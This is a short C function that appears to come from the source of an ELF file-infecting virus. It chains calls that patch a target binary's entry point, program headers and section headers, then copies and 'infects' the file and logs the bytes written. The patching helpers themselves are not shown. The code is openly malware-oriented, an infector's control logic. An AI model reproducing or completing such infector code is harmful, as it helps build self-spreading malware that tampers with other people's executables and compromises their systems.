bool target_action(Target* t, int stat[])
{
  size_t code_size;

  TRACE_DEBUG(-1, "target_action\n");
  if (target_patch_entry_addr(t) &&
      target_patch_phdr(t) &&
      target_patch_shdr(t) &&
      target_open_dst(t) &&
      target_copy_and_infect(t, &code_size)
  )
  {
    TRACE_INFECT(-1, "%s ... wrote %u bytes, Ok\n", t->clean_src, code_size);
    return true;
  }
  return false;
}
